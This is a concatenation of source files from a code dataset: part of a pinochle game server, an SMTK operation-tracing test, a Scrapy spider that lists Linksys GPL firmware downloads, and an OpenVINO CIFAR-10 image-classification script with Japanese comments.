found for round {round_id}.\")\n\n # Retrieve the hand_id for the kitty.\n kitty = str(a_round.hand_id)\n # Clear the kitty before dealing cards into that hand.\n hand.deleteallcards(kitty)\n\n # Collect the individual players from the round's teams.\n player_hand_id = {}\n for t_team_id in [str(x.team_id) for x in round_t]:\n for team_info in utils.query_teamplayer_list(t_team_id):\n # Generate new team hand IDs.\n new_hand_id = str(uuid.uuid4())\n player_hand_id[str(team_info.player_id)] = new_hand_id\n player.update(team_info.player_id, {\"hand_id\": new_hand_id})\n\n LOG.debug(\"kitty=%s\", kitty)\n LOG.debug(\"player_hand_id=%s\", player_hand_id)\n LOG.debug(\"player_hand_ids: %s\", list(player_hand_id.keys()))\n\n if not utils.query_trick_for_round_id(round_id):\n # Create new trick for the round\n trick.create(round_id)\n\n # Time to deal the cards.\n deal_pinochle(\n player_ids=list(player_hand_id.keys()),\n kitty_len=a_game.kitty_size,\n kitty_id=kitty,\n )\n\n # Reset player's flags to enable bidding.\n set_players_bidding(list(player_hand_id.keys()))\n\n game_id = str(a_gameround.game_id)\n\n # Determine the first player to bid this round.\n ordered_player_list = roundteams.create_ordered_player_list(round_id)\n first_bid_player_id = ordered_player_list[\n a_round.round_seq % len(ordered_player_list)\n ]\n\n ws_mess = WSM()\n message = {\n \"action\": \"bid_prompt\",\n \"player_id\": first_bid_player_id,\n \"bid\": a_round.bid,\n }\n ws_mess.websocket_broadcast(game_id, message)\n\n temp_state = utils.query_game(game_id).state\n message = {\n \"action\": \"game_start\",\n \"game_id\": game_id,\n \"state\": temp_state,\n }\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message)\n return make_response(f\"Round {round_id} started.\", 200)\n\n\ndef score_hand_meld(round_id: str, player_id: str, cards: str):\n \"\"\"\n This function scores a player's meld hand given the list of cards.\n\n :param round_id: Id of the round in play\n :param player_id: Id of the player\n :param cards: Comma separated list of cards submitted for meld.\n :return: 200 on successful scoring of cards, 404 if not found,\n 409 if scoring isn't successful.\n \"\"\"\n LOG.debug(\"round_id=%s\", round_id)\n # Get the round requested\n a_round: Round = utils.query_round(round_id)\n a_player: Optional[Player] = utils.query_player(player_id)\n game_id: str = str(utils.query_gameround_for_round(round_id).game_id)\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find the player?\n if a_player is None or a_player == {}:\n abort(409, f\"No player found for {player_id}.\")\n\n score = 0\n card_list = []\n if len(cards) > 2:\n # Associate the player with that player's hand.\n player_temp: Optional[Player] = utils.query_player(player_id=player_id)\n player_hand_id = str(player_temp.hand_id) if player_temp else utils.UUID_ZEROS\n player_hand = utils.query_hand_list(player_hand_id)\n player_hand_list = [x.card for x in player_hand]\n card_list = cards.split(\",\")\n\n LOG.debug(\"score_hand_meld: player_hand=%s\", player_hand_list)\n LOG.debug(\"score_hand_meld: card_list=%s\", card_list)\n\n for item in card_list:\n if item not in player_hand_list:\n abort(409, f\"Card {item} not in player's hand.\")\n\n # Convert from list of SVG card names to PinochleDeck list.\n cardclass_list = card_utils.convert_from_svg_names(card_list)\n\n # Set trump, if it's been declared (and recorded in the database)\n temp_trump: str = 
\"{}s\".format(a_round.trump.capitalize())\n provided_deck = PinochleDeck(cards=cardclass_list)\n\n # Set trump on the newly created deck, if it's been declared\n if temp_trump in SUITS:\n LOG.debug(\"Called trump %s in %s.\", temp_trump, SUITS)\n provided_deck = card_utils.set_trump(temp_trump, provided_deck)\n\n # Score the deck supplied.\n score = score_meld.score(provided_deck)\n\n player.update(player_id=player_id, data={\"meld_score\": score})\n\n # Send card list and meld score to other players via Websocket\n message = {\n \"action\": \"meld_update\",\n \"game_id\": game_id,\n \"player_id\": player_id,\n \"card_list\": card_list,\n \"meld_score\": score,\n }\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message, player_id)\n LOG.debug(\"score_hand_meld: score=%s\", score)\n return make_response(json.dumps({\"score\": score}), 200)\n\n\ndef new_round(game_id: str, current_round: str) -> Response:\n \"\"\"\n Cycle the game to a new round.\n\n :param game_id: The game receiving a new round.\n :type game_id: str\n :param current_round: The round being retired.\n :type current_round: str\n :return: Response to the web request originating the request.\n :rtype: Response\n \"\"\"\n # Deactivate soon-to-be previous round.\n prev_seq: int = utils.query_round(current_round).round_seq\n LOG.debug(\"new_round: prev_seq=%s\", prev_seq)\n prev_gameround: GameRound = utils.query_gameround(game_id, current_round)\n gameround.update(game_id, prev_gameround.round_id, {\"active_flag\": False})\n\n player_ids = utils.query_player_ids_for_round(str(prev_gameround.round_id))\n for player_id in player_ids:\n player.update(player_id, {\"meld_final\": False, \"meld_score\": 0})\n\n # Create new round and gameround\n temp_gameround, __ = round_.create(game_id)\n # Obtain the new round's ID.\n temp_round_id = temp_gameround[\"round_id\"]\n cur_roundteam: List[RoundTeam] = utils.query_roundteam_list(current_round)\n # Tie the current teams to the new round.\n roundteams.create(temp_round_id, [str(t.team_id) for t in cur_roundteam])\n # Increment the round_seq for the new round\n round_.update(temp_round_id, {\"round_seq\": prev_seq + 1})\n LOG.debug(\"new_round: new_seq=%s\", utils.query_round(temp_round_id).round_seq)\n\n # Create new trick for the round\n trick.create(temp_round_id)\n\n # Start the new round.\n return start(temp_round_id)\n\n\ndef start_next_trick(round_id: str, player_id: str) -> Response:\n \"\"\"\n Create a new trick setting player_id as the 'bid winner'.\n\n :param round_id: The round in play.\n :type round_id: str\n :param player_id: The player initiating the continue instruction.\n :type player_id: str\n :return: Response to the web request originating the request.\n :rtype: Response\n \"\"\"\n LOG.debug(\"\\nIn start_next_trick: round_id=%s\", round_id)\n # Get the round requested\n a_round: Round = utils.query_round(round_id)\n round_player_list: List[str] = utils.query_player_ids_for_round(round_id)\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find the player?\n if player_id not in round_player_list:\n abort(409, f\"No player found for {player_id}.\")\n\n # Create the next trick.\n t_trick, _ = trick.create(round_id)\n trick.update(str(t_trick[\"trick_id\"]), {\"trick_starter\": player_id})\n\n # Send notice of new trick to all players via Websocket\n game_id: str = str(utils.query_gameround_for_round(round_id).game_id)\n message = {\n \"action\": \"trick_next\",\n \"game_id\": game_id,\n 
\"player_id\": player_id,\n }\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message)\n\n return make_response(\"Start next trick\", 200)\n\n\ndef reorder_players(round_id: str, winner_id: str) -> List[str]:\n \"\"\"\n Create ordered list of players starting with the player_id supplied.\n\n :param round_id: The round in play.\n :type round_id: str\n :param winner_id: Player ID of the bid or trick winner.\n :type winner_id: str\n :return: List of player_ids in order starting with the bid or trick winner\n :rtype: List[str]\n \"\"\"\n round_player_id_list = utils.query_player_ids_for_round(round_id)\n\n # Locate the index of the winner in the player list\n starting_index = round_player_id_list.index(winner_id)\n LOG.debug(\"reorder_players: starting_index=%s\", starting_index)\n\n # Generate a list of indices for the players, starting with the\n # player id passed in as winner_id.\n player_list_len = len(round_player_id_list)\n ordered_player_index_list = [\n (x + starting_index) % player_list_len for x in range(player_list_len)\n ]\n return [round_player_id_list[x] for x in ordered_player_index_list]\n\n\ndef play_trick_card(round_id: str, player_id: str, card: str) -> Response:\n \"\"\"\n Accept a card played by player for current trick.\n\n :param round_id: The round in play.\n :type round_id: str\n :return: Response to the web request originating the request.\n :rtype: Response\n \"\"\"\n LOG.debug(\"\\nplay_trick_card: round_id=%s\", round_id)\n # Get the round requested\n a_round: Round = utils.query_round(round_id)\n a_player: Optional[Player] = utils.query_player(player_id)\n game_id: str = str(utils.query_gameround_for_round(round_id).game_id)\n\n # Did we find a round?\n if a_round is None or a_round == {}:\n abort(404, f\"Round {round_id} not found.\")\n\n # Did we find the player?\n if a_player is None or a_player == {}:\n abort(409, f\"No player found for {player_id}.\")\n\n # Retrieve trick data\n a_trick: Trick = utils.query_trick_for_round_id(round_id)\n if a_trick is None or a_trick == {}:\n LOG.debug(\n \"play_trick_card: utils.query_all_tricks()=%s\", utils.query_all_tricks()\n )\n abort(409, f\"Trick could not be found for round {round_id}.\")\n\n # Associate the player with that player's hand.\n player_temp: Optional[Player] = utils.query_player(player_id=player_id)\n player_hand_id: str = str(player_temp.hand_id) if player_temp else utils.UUID_ZEROS\n player_hand: List[Hand] = utils.query_hand_list(player_hand_id)\n player_hand_list: List[str] = [x.card for x in player_hand]\n\n LOG.debug(\"play_trick_card: player_hand=%s\", player_hand_list)\n\n if card not in player_hand_list:\n abort(409, f\"Card {card} not in player's hand.\")\n\n # TODO: Make sure the player hasn't already sent a card for this trick.\n\n # Determine the order of the players\n ordered_player_id_list: List[str] = reorder_players(\n str(round_id), str(a_trick.trick_starter)\n )\n\n # Obtain trick hand ID\n trick_hand_id = str(a_trick.hand_id)\n\n # Add card to trick deck\n hand.addcard(trick_hand_id, card, ordered_player_id_list.index(player_id))\n # Remove card from player's hand\n hand.deletecard(player_hand_id, card)\n\n # Send played card to other players via Websocket\n message = {\n \"action\": \"trick_card\",\n \"game_id\": game_id,\n \"player_id\": player_id,\n \"card\": card,\n }\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message, player_id)\n\n # Determine if the trick is complete (all players submitted cards) and if so, declare\n # trick winner.\n trick_hand_list: 
List[Hand] = utils.query_hand_list(trick_hand_id)\n\n LOG.debug(\"play_trick_card: trick_hand_list=%s\", trick_hand_list)\n if len(trick_hand_list) == len(ordered_player_id_list):\n LOG.debug(\"play_trick_card: trick_hand_list=%s\", trick_hand_list)\n winning_card: str = find_winning_trick_card(\n trick_hand_list, f\"{a_round.trump.capitalize()}s\"\n )\n LOG.debug(\"play_trick_card: Winning card: %s\", winning_card)\n winning_card_index = -1\n LOG.debug(\"play_trick_card: Trick cards: %s\", [x.card for x in trick_hand_list])\n LOG.debug(\n \"play_trick_card: Determining winning card index for %s:\", winning_card\n )\n for index, t_hand in enumerate(trick_hand_list):\n LOG.debug(\"play_trick_card: index: %s = %s\", index, t_hand.card)\n if winning_card == t_hand.card:\n winning_card_index = index\n break\n assert winning_card_index != -1\n LOG.debug(\"play_trick_card: winning_card_index=%s\", winning_card_index)\n\n # Determine the player_id who won the trick and their team_id.\n winning_player_id: str = ordered_player_id_list[winning_card_index]\n a_roundteam_list = utils.query_roundteam_list(round_id)\n team_id_list = [x.team_id for x in a_roundteam_list]\n winning_team_id = None\n for team_id in team_id_list:\n if winning_player_id in [\n str(x.player_id) for x in utils.query_teamplayer_list(team_id)\n ]:\n winning_team_id = team_id\n assert winning_team_id\n winning_team_hand_id = str(\n utils.query_roundteam(round_id, winning_team_id).hand_id\n )\n LOG.debug(\"play_trick_card: Winning player: %s\", winning_player_id)\n\n # Copy the cards in the trick hand to the winning player's team's hand.\n for a_hand in trick_hand_list:\n hand.addcard(winning_team_hand_id, a_hand.card)\n # Update the trick winner in the database\n trick.update(str(a_trick.trick_id), {\"trick_winner\": winning_player_id})\n\n # Check to see if a player has cards left in their hand.\n if hand.read_one(player_hand_id):\n LOG.debug(\"play_trick_card: Sending trick_won message.\")\n # Send played card to other players via Websocket\n message = {\n \"action\": \"trick_won\",\n \"game_id\": game_id,\n \"player_id\": winning_player_id,\n \"winning_card\": winning_card,\n }\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message)\n else:\n LOG.debug(\"play_trick_card: Calling notify_round_complete.\")\n # The last trick for this round has been played.\n notify_round_complete(game_id, round_id, winning_player_id, winning_team_id)\n LOG.debug(\"Exiting play_trick_card, when trick is complete.\")\n\n return make_response(\"Card accepted\", 200)\n\n\ndef find_winning_trick_card(trick_card_list: List[Hand], trump: str) -> str:\n \"\"\"\n Determine the card in the list which wins the trick, based on trump. 
The card list is\n ordered such that the card that was 'led' is in position 0.\n\n :param trick_card_list: Ordered list of Hand classes.\n :type trick_card_list: List[Hand]\n :param trump: The suit designated as trump for this round.\n :type trump: str\n :return: The card that won the trick.\n :rtype: str\n \"\"\"\n # Convert the list of cards (in Hand classes) to PinochleDeck\n temp_deck = card_utils.convert_from_svg_names([x.card for x in trick_card_list])\n trick_deck = card_utils.set_trump(trump, temp_deck)\n\n # If nothing else beats it, the card led for the trick wins.\n winning_card = trick_deck[0]\n suit_led = winning_card.suit\n\n for card in trick_deck:\n LOG.debug(\"card=%s - winning_card=%s - trump=%s\", card, winning_card, trump)\n if winning_card == card:\n LOG.debug(\"%s == %s\", winning_card, card)\n continue\n if card.suit == trump and winning_card.suit != trump:\n LOG.debug(\n \"%s == %s and %s != %s\", card.suit, trump, winning_card.suit, trump\n )\n winning_card = card\n suit_led = winning_card.suit\n continue\n if card.suit == suit_led and card > winning_card:\n LOG.debug(\n \"%s == %s and %s > %s\",\n card.suit,\n suit_led,\n card.value,\n winning_card.value,\n )\n winning_card = card\n continue\n\n return card_utils.convert_to_svg_name(winning_card)\n\n\ndef notify_round_complete(\n game_id: str, round_id: str, winning_player_id: str, winning_team_id: str\n):\n \"\"\"\n The last trick for this round has been played. Tally the scores and notify players.\n\n :param game_id: ID of the game being played\n :type game_id: str\n :param round_id: ID of the round of that game\n :type round_id: str\n :param winning_player_id: The ID of the player who won the last trick.\n :type winning_player_id: str\n \"\"\"\n LOG.debug(\"In notify_round_complete.\")\n # Collect data needed for notification.\n a_roundteam_list = utils.query_roundteam_list(round_id)\n team_id_list = [str(x.team_id) for x in a_roundteam_list]\n t_hand_id_list = [str(x.hand_id) for x in a_roundteam_list]\n\n # Score the team hands\n trick_score = {}\n assert t_hand_id_list\n LOG.debug(\"notify_round_complete: t_hand_id_list=%s\", t_hand_id_list)\n for index, h_id in enumerate(t_hand_id_list):\n hand_h_id = hand.read_one(h_id)\n if hand_h_id:\n trick_score[team_id_list[index]] = score_tricks.score(\n card_utils.convert_from_svg_names(hand_h_id[\"cards\"])\n )\n if str(team_id_list[index]) == str(winning_team_id):\n trick_score[team_id_list[index]] += 1\n LOG.debug(\n \"notify_round_complete: Score for team %s: %s\",\n team_id_list[index],\n trick_score[team_id_list[index]],\n )\n else:\n LOG.debug(\"notify_round_complete: Zero score %s/%s\", index, h_id)\n trick_score[team_id_list[index]] = 0\n\n # Update the overall team scores\n # FIXME: Handle case where bid winner's team doesn't make the bid.\n team_scores = {}\n for t_id in team_id_list:\n a_team = utils.query_team(t_id)\n score = a_team.score + trick_score[t_id]\n team.update(t_id, {\"score\": score})\n team_scores[t_id] = score\n\n # Notify the players of the final trick score.\n message = {\n \"action\": \"score_round\",\n \"game_id\": game_id,\n \"player_id\": winning_player_id,\n \"team_trick_scores\": trick_score,\n \"team_scores\": team_scores,\n }\n LOG.debug(\"notify_round_complete: Sending WSM to clients. 
%s\", message)\n ws_mess = WSM()\n ws_mess.websocket_broadcast(game_id, message)\n LOG.debug(\"Exiting notify_round_complete.\")\n","repo_name":"kronenpj/pinochle","sub_path":"src/pinochle/play_pinochle.py","file_name":"play_pinochle.py","file_ext":"py","file_size_in_byte":32065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74667488473","text":"import os\n\nimport unittest\nimport smtk\nimport smtk.attribute\nimport smtk.attribute_builder\nimport smtk.extension.paraview.appcomponents\nimport smtk.io\nimport smtk.operation\nimport smtk.session.vtk\nimport smtk.resource\nimport smtk.testing\nimport re\nfrom smtk.operation import configureAttribute\nfrom smtk.extension.paraview.appcomponents import pqSMTKPythonTrace\n\nOP_SUCCEEDED = int(smtk.operation.Operation.Outcome.SUCCEEDED)\n\nSBT = \"\"\"\n\n\n \n \n \n \n 0\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 0.0\n \n \n \n \n \n \n 1\n \n 2\n \n conditional-double\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\"\"\"\n\nPATH = 'path'\nVALUE = 'value'\nSPEC = {\n 'associations': [{'resource': 'model'}],\n 'items': [\n {PATH: 'string-item', VALUE: 'xyzzy'},\n {PATH: '/double-item', VALUE: [3.14159, None, 2.71828]},\n {PATH: 'int-item', 'enabled': True, VALUE: 2},\n {PATH: 'int-item/conditional-double', VALUE: 42.42},\n {PATH: 'comp-item', VALUE: [\n {'resource': 'model', 'component': 'casting'},\n {'resource': 'model', 'component': 'symmetry'},\n ]},\n {PATH: '/group-item', 'count': 2},\n {PATH: '/group-item/0/subgroup-double', VALUE: 73.73},\n {PATH: '/group-item/1/subgroup-double', VALUE: 83.83},\n ]\n}\n\n\nclass TestOp(smtk.operation.Operation):\n\n def __init__(self):\n smtk.operation.Operation.__init__(self)\n\n def name(self):\n return \"test op\"\n\n def operateInternal(self):\n smtk.WarningMessage(self.log(), 'My string is \\\"%s\\\"' %\n self.parameters().findString('string-item').value())\n\n # Return with success\n result = self.createResult(smtk.operation.Operation.Outcome.SUCCEEDED)\n # result.findString('my string').setValue(\n # self.parameters().findString('my string').value())\n return result\n\n def createSpecification(self):\n spec = smtk.attribute.Resource.New()\n reader = smtk.io.AttributeReader()\n err = reader.readContents(spec, SBT, self.log())\n\n if err:\n print(self.log().convertToString())\n\n return spec\n\n\nclass TestOperationTracing(smtk.testing.TestCase):\n def import_model(self):\n \"\"\"Import a model resource to test operation tracing.\"\"\"\n gen_path = os.path.join(smtk.testing.DATA_DIR,\n 'model/3d/genesis/filling1.gen')\n import_op = smtk.session.vtk.Import.create()\n import_op.parameters().findFile('filename').setValue(gen_path)\n # Demonstrate/test use of safeOperate() instead of operate():\n resource = None\n\n def handler(op, result):\n nonlocal resource\n resource = smtk.model.Resource.CastTo(\n result.find('resource').value())\n outcome = import_op.safeOperate(handler)\n print('Outcome = ', outcome)\n self.assertEqual(outcome, smtk.operation.Operation.Outcome.SUCCEEDED,\n 'Failed to import model file {}'.format(gen_path))\n print('Resource is ', resource)\n return resource\n\n def test_operation_tracing(self):\n model_resource = self.import_model()\n\n op = TestOp.create(__name__, \"TestOp\", 1)\n parameters = op.parameters()\n\n builder = smtk.attribute_builder.AttributeBuilder()\n resource_dict = dict(model=model_resource)\n SPEC['resources'] = resource_dict\n # use the method that will be 
produced by python tracing.\n configureAttribute(parameters, SPEC)\n # check it did something.\n assert (parameters.find('int-item').value() == 2)\n\n # now check that we are able to trace the operation\n tracer = pqSMTKPythonTrace()\n op_trace = tracer.traceOperation(op, testing=True)\n print(\"operation trace:\\n\", op_trace)\n # non-default items should be traced.\n assert (op_trace.find(\n \"'path': 'double-item', 'value': [ 3.1415899999999999, None, 2.71828 ]\") > 0)\n assert (op_trace.find(\n \"'path': 'int-item/conditional-double', 'value': 42.42\") > 0)\n assert (op_trace.find(\"'resource': 'filling1', 'component': 'casting'\") > 0)\n assert (op_trace.find(\"'resource': 'filling1', 'component': 'symmetry'\") > 0)\n assert (op_trace.find(\"'path': 'group-item', 'count': 2\") > 0)\n assert (op_trace.find(\n \"'path': 'group-item/0/subgroup-double', 'value': 73.73\") > 0)\n assert (op_trace.find(\n \"'path': 'group-item/1/subgroup-double', 'value': 83.829\") > 0)\n\n\nif __name__ == '__main__':\n smtk.testing.process_arguments()\n unittest.main()\n","repo_name":"Kitware/SMTK","sub_path":"smtk/operation/testing/python/testOperationTracing.py","file_name":"testOperationTracing.py","file_ext":"py","file_size_in_byte":6672,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"5"} +{"seq_id":"37269254499","text":"from typing import Generator, Tuple\n\nfrom scrapy import Request, Spider\nfrom scrapy.http import Response\nfrom scrapy.loader import ItemLoader\n\nfrom firmware.items import FirmwareItem\n\n\nclass LinksysGPL(Spider):\n handle_httpstatus_list = [404]\n name = 'linksys_gpl'\n\n allowed_domains = [\n 'www.linksys.com',\n 'downloads.linksys.com'\n ]\n\n start_urls = [\n 'https://www.linksys.com/de/support-article?articleNum=114663',\n ]\n\n whitelist_enabled = True\n\n whitelist = ['EA7500']\n\n download_maxsize = 2147483648 # 2GiB\n\n XPATH = {\n 'table_rows': '//table/thead/tr',\n 'row_columns': './/td',\n }\n\n def parse(self, response: Response, **kwargs: {}) -> Generator[Request, None, None]:\n firmware_extractor = LinksysGPL.extract_firmwares(response)\n for device, version, link in self.firmware_filter(firmware_extractor):\n yield from LinksysGPL.collect_firmware(device, version, link)\n\n def firmware_filter(self, extractor: Generator[Tuple[str, str, str], None, None]) -> Generator[Tuple[str, str, str], None, None]:\n if not self.whitelist_enabled:\n yield from extractor\n return\n\n for device, version, link in extractor:\n if any(allowed in device for allowed in self.whitelist):\n yield device, version, link\n\n @staticmethod\n def collect_firmware(device_name: str, version: str, link: str) -> Generator[FirmwareItem, None, None]:\n meta_data = LinksysGPL.prepare_meta_data(device_name, version, link)\n yield from LinksysGPL.prepare_item_pipeline(meta_data)\n\n @staticmethod\n def extract_firmwares(response: Response) -> Generator[Tuple[str, str, str], None, None]:\n device_names = []\n table = response.xpath(LinksysGPL.XPATH['table_rows'])[1:]\n for row in table:\n columns = row.xpath(LinksysGPL.XPATH['row_columns'])\n if len(columns) not in [2, 3]:\n continue\n\n offset = 0\n if len(columns) == 3:\n device_names = columns[0].xpath('.//text()').extract()\n offset = 1\n\n version = ''.join(columns[offset].xpath('.//text()').extract()).strip()\n link = ''.join(columns[offset + 1].xpath('.//a/@href').extract()).strip()\n for device in device_names:\n yield device.strip(), version, link\n\n @staticmethod\n def 
prepare_item_pipeline(meta_data: dict) -> Generator[FirmwareItem, None, None]:\n loader = ItemLoader(item=FirmwareItem(), selector=meta_data['file_urls'])\n loader.add_value('file_urls', meta_data['file_urls'])\n loader.add_value('vendor', meta_data['vendor'])\n loader.add_value('device_name', meta_data['device_name'])\n loader.add_value('device_class', meta_data['device_class'])\n loader.add_value('firmware_version', meta_data['firmware_version'])\n loader.add_value('release_date', meta_data['release_date'])\n yield loader.load_item()\n\n @staticmethod\n def prepare_meta_data(device_name: str, firmware_version: str, file_url: str) -> dict:\n return {\n 'file_urls': [file_url],\n 'vendor': 'Linksys',\n 'device_name': device_name,\n 'firmware_version': firmware_version,\n 'device_class': '-', # no information available\n 'release_date': '01-01-1970', # no information available\n }\n","repo_name":"mellowCS/FirmwareScraper","sub_path":"firmware/spiders/linksys_gpl.py","file_name":"linksys_gpl.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"30953102316","text":"#!/usr/bin/env python\nimport sys\nimport os\nimport time\nimport logging as log\nfrom argparse import ArgumentParser, SUPPRESS, RawTextHelpFormatter\nimport cv2\nimport numpy as np\n\n# 環境変数設定スクリプトが実行されているか確認\nif not \"INTEL_OPENVINO_DIR\" in os.environ:\n print(\"/opt/intel/openvino/bin/setupvars.sh が 実行されていないようです\")\n sys.exit(1)\nelse:\n # 環境変数を取得するには os.environ['INTEL_OPENVINO_DIR']\n # これを設定されてない変数に対して行うと例外を吐くので注意\n pass\n\n# openvino.inference_engine のバージョン取得\nfrom openvino.inference_engine import get_version as ov_get_version\nov_vession_str = ov_get_version()\n# print(ov_vession_str) # バージョン2019には '2.1.custom_releases/2019/R~'という文字列が入っている\n # バージョン2020には '~-releases/2020/~'という文字列が入っている\n # バージョン2021には '~-releases/2021/~'という文字列が入っている\n\n# バージョン判定\nif \"/2019/R\" in ov_vession_str :\n ov_vession = 2019 # 2019.*\nelif \"releases/2020/\" in ov_vession_str :\n ov_vession = 2020 # 2020.*\nelse :\n ov_vession = 2021 # デフォルト2021\n\nfrom openvino.inference_engine import IENetwork, IECore\n\nif ov_vession >= 2021 : \n # バージョン2021以降はngraphを使用\n import ngraph\n\n# ラベルマップ\nlabel_map = [\n \"飛行機\",\n \"自動車\",\n \"鳥\",\n \"猫\",\n \"鹿\",\n \"犬\",\n \"カエル\",\n \"馬\",\n \"船\",\n \"トラック\"\n]\n\n\n# コマンドラインパーサの構築 =====================================================\ndef build_argparser():\n parser = ArgumentParser(add_help=False, formatter_class=RawTextHelpFormatter)\n parser.add_argument('-h', '--help', action='help', default=SUPPRESS, \n help='Show this help message and exit.')\n parser.add_argument(\"-d\", \"--device\", default=\"CPU\", type=str, \n help=\"Optional\\n\"\n \"Specify the target device to infer on; \\n\"\n \"CPU, GPU, FPGA, HDDL or MYRIAD is acceptable.\\n\"\n \"The demo will look for a suitable plugin \\n\"\n \"for device specified.\\n\"\n \"Default value is CPU\")\n parser.add_argument(\"-l\", \"--cpu_extension\", type=str, default=None, \n help=\"Optional.\\n\"\n \"Required for CPU custom layers. 
\\n\"\n \"Absolute path to a shared library\\n\"\n \"with the kernels implementations.\\n\"\n \"以前はlibcpu_extension_avx2.so 指定が必須だったけど、\\n\"\n \"2020.1から不要になった\")\n return parser\n# ================================================================================\n# 結果の解析と表示\ndef decode_result(net, res, num_result=5) :\n out_blob = list(net.outputs.keys())[0]\n \n # for obj in res[out_blob][0][0]: # 例:このループは200回まわる\n if hasattr(res[out_blob], 'buffer') :\n # # 2021以降のバージョン\n res_shape = res[out_blob].buffer.shape\n # (1,10)のはず\n res_array = res[out_blob].buffer[0]\n else :\n res_shape = res[out_blob].shape\n res_array = res[out_blob][0]\n # 結果を降順に並べ替え\n sorted_res = np.argsort(res_array)[-num_result:][::-1]\n results = [(i, res_array[i]) for i in sorted_res]\n\n return results\n# ================================================================================\n\ndef main():\n log.basicConfig(format=\"[ %(levelname)s ] %(message)s\", level=log.INFO, stream=sys.stdout)\n \n # コマンドラインオプションの解析\n args = build_argparser().parse_args()\n \n model_xml = \"./_IR/cifar10/FP16/cifar10.xml\" # モデルファイル名(xml)(決め打ちで)\n model_bin = os.path.splitext(model_xml)[0] + \".bin\" # モデルファイル名(bin)\n \n # 指定されたデバイスの plugin の初期化\n log.info(\"Creating Inference Engine...\")\n ie = IECore()\n # 拡張ライブラリのロード(CPU使用時のみ)\n if args.cpu_extension and 'CPU' in args.device:\n log.info(\"Loading Extension Library...\")\n ie.add_extension(args.cpu_extension, \"CPU\")\n \n # IR(Intermediate Representation ;中間表現)ファイル(.xml & .bin) の読み込み\n log.info(f\"Loading model files:\\n\\t{model_xml}\\n\\t{model_bin}\\n\")\n # 2020.2以降、IENetwork()は非推奨となったため、ie.read_network()に差し替え\n if hasattr(ie, 'read_network') : # 2020.2以降のバージョン(IECore.read_networkメソッドがあるかで判定)\n net = ie.read_network(model=model_xml, weights=model_bin)\n else :\n net = IENetwork(model=model_xml, weights=model_bin)\n \n # 未サポートレイヤの確認\n if \"CPU\" in args.device:\n # サポートしているレイヤの一覧\n supported_layers = ie.query_network(net, \"CPU\")\n ### # netで使用されているレイヤでサポートしているレイヤの一覧にないもの\n ### not_supported_layers = [l for l in net.layers.keys() if l not in supported_layers]\n # netで使用されているレイヤ一覧\n if \"ngraph\" in sys.modules : # ngraphがインポート済みかで判定\n # バージョン 2021.x以降\n used_layers = [l.friendly_name for l in ngraph.function_from_cnn(net).get_ordered_ops()]\n else :\n # バージョン 2020.x以前\n used_layers = list(net.layers.keys())\n # netで使用されているレイヤでサポートしているレイヤの一覧にないもの\n not_supported_layers = [l for l in used_layers if l not in supported_layers]\n # サポートされていないレイヤがある?\n if len(not_supported_layers) != 0:\n # エラー終了\n log.error(f\"Following layers are not supported by the plugin for specified device {args.device}:\\n {', '.join(not_supported_layers)}\")\n log.error(\"Please try to specify cpu extensions library path in sample's command line parameters using -l \"\n \"or --cpu_extension command line argument\")\n sys.exit(1)\n \n # 入力層の情報出力\n log.info(\"Preparing inputs\")\n img_info_input_blob = None\n if hasattr(net, 'input_info') : # 2021以降のバージョン\n inputs = net.input_info\n else :\n inputs = net.inputs\n\n for blob_name in inputs:\n if hasattr(inputs[blob_name], 'shape') : # 2020以前のバージョン\n input_shape = inputs[blob_name].shape\n else : # 2021以降のバージョン\n input_shape = inputs[blob_name].input_data.shape\n print(f'==== {blob_name} {input_shape}')\n if len(input_shape) == 4:\n # 入力層でshapeが4のものを取り出す\n input_blob = blob_name\n else:\n # なければエラー\n raise RuntimeError(f\"Unsupported {len(input_shape)} input layer '{ blob_name}'. 
Only 4D input layers are supported\")\n    \n    # Get the input image geometry\n    if hasattr(inputs[input_blob], 'input_data') :\n        input_n, input_colors, input_height, input_width = inputs[input_blob].input_data.shape\n    else :\n        input_n, input_colors, input_height, input_width = inputs[input_blob].shape\n    \n    # dictionary used to feed input data\n    feed_dict = {}\n    \n    # still images, so only synchronous mode is used\n    cur_request_id = 0  # synchronous mode uses only ID=0\n    next_request_id = 0  # ditto\n    wait_key_code = 0  # wait forever\n    \n    # Load the model into the plugin\n    log.info(\"Loading model to the plugin...\")\n    exec_net = ie.load_network(network=net, num_requests=2, device_name=args.device)\n    \n    # Start inference\n    log.info(\"Starting inference...\")\n    \n    print(\"==== SINGLE MODE ====\")\n    for file_number in range(100) :\n        # Image preprocessing =============================================================================\n        # load the input image\n        file_name = f'../img/{file_number}.png'\n        # print(f'FILE: {file_name}')\n        img = cv2.imread(file_name)\n        \n        # build the input frame\n        in_frame = cv2.resize(img, (input_width, input_height))  # resize\n        in_frame = in_frame.transpose((2, 0, 1))  # HWC → CHW\n        in_frame = in_frame.reshape(input_shape)  # CHW → BCHW\n        feed_dict[input_blob] = in_frame\n        \n        inf_start = time.time()  # inference start time --------------------------------\n        # Queue the inference request =============================================================================\n        exec_net.start_async(request_id=next_request_id, inputs=feed_dict)\n        \n        # Wait for the inference result =============================================================================\n        while exec_net.requests[cur_request_id].wait(-1) != 0:\n            continue\n        \n        inf_end = time.time()  # inference end time --------------------------------\n        inf_time = inf_end - inf_start  # inference duration\n        \n        # Parse the detection results =============================================================================\n        if hasattr(exec_net.requests[cur_request_id], 'output_blobs') :  # versions 2021 and later\n            res = exec_net.requests[cur_request_id].output_blobs\n        else :\n            res = exec_net.requests[cur_request_id].outputs\n        # print(res)\n        \n        # Decode the results\n        results = decode_result(net, res, 5)\n        # Display the results 